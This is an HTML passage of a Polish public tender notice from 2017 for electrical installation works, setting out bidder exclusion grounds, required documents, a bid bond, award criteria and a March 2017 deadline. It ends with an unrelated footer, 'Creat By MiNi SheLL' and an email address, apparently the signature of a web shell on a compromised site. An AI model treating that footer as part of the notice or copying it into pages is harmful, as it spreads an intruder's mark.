-posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym posiadają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia. 
Ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr 2 do SIWZ .Następnie na podstawie wypełnionego przez wybranego Wykonawcę Załącznika nr 6 do SIWZ - wykaz osób.                     
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1ustawy Pzp, (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu o składania ofert)</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />2)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości , daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty  zgodnie z załącznikiem nr 5 do siwz
3)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z załącznikiem nr 6 do SIWZ,
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Przystępując do niniejszego postępowania, zamawiający wymaga wniesienia wadium.
Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 30 000 zł (słownie: trzydzieści tysięcy 00/100 złotych).
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
         Bank Spółdzielczy w Brodnicy Oddział Operacyjny w Biskupcu 
         nr  58 9484 1121 2002 0100 0286 0002
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego  w kancelarii pok. Nr 13  lub dołączyć do oferty.
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.
8.	W przypadku gwarancji bankowej lub ubezpieczeniowej niezbędnym jest przedłożenie pisemnej bezwarunkowej gwarancji udzielonej przez bank lub firmę ubezpieczeniową (oświadczenie), zgodnie z wymaganiami określonymi przez prawo bankowe.
9.	W przypadku poręczenia niezbędnym jest złożenie przez poręczyciela oświadczenia pisemnego wobec wierzyciela .
10.	Złożone poręczenie/gwarancja musi zawierać:
11.	 Termin obowiązywania gwarancji/poręczenia do końca okresu związania ofertą,
12.	 Informację, że udzielona gwarancja/poręczenie stanowi zabezpieczenie na wadium na rzecz Zamawiającego,
13.	 Zobowiązanie zgodne z art. 46 ust. 4a i ust. 5 ustawy prawo zamówień publicznych :
      Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
- Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
- Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
-Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy."
14.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie,  nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust.1, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
15.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)	Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
2)	Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
3)	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określił we wzorze umowy okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty , w szczególności przewiduje koniczność zmiany w przypadku : 2.1 zmiany terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy; 2.2 zmiany osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy; 2.3 wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy 2.4 zmiany podwykonawcy 3. Zmiany, o których mowa w ust. 2 oraz wszelkie pozostałe wymienione we wzorze umowy, dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji przez Zamawiającego. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com